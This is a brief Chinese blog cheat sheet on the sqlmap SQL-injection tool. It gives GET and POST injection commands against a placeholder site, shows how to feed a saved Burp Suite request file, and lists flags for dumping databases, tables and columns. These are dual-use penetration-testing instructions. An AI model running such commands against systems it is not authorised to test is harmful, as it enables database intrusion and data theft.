雕木乱

sqlmap数据库注入

hykeda2年前Mysql362

get方式注入:

sqlmap.py -u "https://www.abc.com?a=111&w=111" -batch

post方法注入:

sqlmap.py -u "https://www.abc.com" --data="a=111&w=111" -batch

sqlmap盲注
-r burpsuite请求数据包保存成xx.txt文件,在对应注入的位置画*
sqlmap -r xx.txt 进行注入
–level 注入等级,2时可以测试cookie,HTTP User-Agent/Referer头在level为3的时候就会测试
-p 指定注入的参数
-u 网站url
–current-db 爆数据库 (或者 --dbs)
–tables 爆表
–columns 爆列
–batch 自动选择(y/n)

标签: sqlmapsql注入
返回列表

上一篇:两台阿里云ECS直接数据传输

下一篇:git抓去远程仓库报错can’t be established.

相关文章

MySQL索引原理及慢查询优化

MySQL索引原理及慢查询优化

MySQL凭借着出色的性能、低廉的成本、丰富的资源,已经成为绝大多数互联网公司的首选关系型数据库。虽然性能出色,但所谓“好马配好鞍”,如何能够更好的使用它,已经成为开发工程师的必修课,我...

mysql数据库查看进程数

mysql数据库查看进程数

查看当前正在运行的mysql线程 show processlist (默认查看前100条) show full processlist (查看所有线程)...

mysql数据库索引建立

mysql建立的索引是有先后顺序之分的。 查询语句:SELECT *  FROM `table` `f` WHERE  `f`.`iStatus` = 1&nbs...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright zhangkeda.com Rights Reserved.浙ICP备15038509号-2